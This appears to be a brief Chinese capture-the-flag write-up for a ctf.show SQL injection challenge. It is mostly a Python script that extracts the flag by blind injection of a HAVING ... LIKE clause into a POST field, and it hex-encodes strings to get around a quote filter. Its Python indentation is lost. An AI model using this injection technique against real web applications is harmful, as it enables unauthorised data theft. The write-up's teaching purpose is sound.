这题使用这个知识点SQL注入中的WHERE、HAVING 和 ON 条件语句
脚本
import requests, re
dic = "-1234567890abcdefghijklmnopqrstuvwxyz"
url = "http://77f67f80-314c-4fcb-aeee-047f4aa6f35f.challenge.ctf.show/select-waf.php"
res = []
post_tem = "ctfshow_user group by pass HAVING pass like {}"
def str_to_hex(s):
return ''.join([hex(ord(c)).replace('0x', '') for c in s])
for a in range(1, 50):
temp = res.__len__()
for i in dic:
res += i
post = {"tableName": post_tem.format("0x"+str_to_hex("ctfshow{"+"".join(res)+"%}"))}
print(post)
r = requests.post(url=url, data=post)
if re.findall("\$user_count = 1", r.text):
break
res.pop(-1)
if temp == res.__len__():
break
print("ctfshow{" + "".join(res) + "}")
需要注意一下这题过滤了单双引号,需要用十六进制字符串绕过,十六进制字符串中不需要带单双引号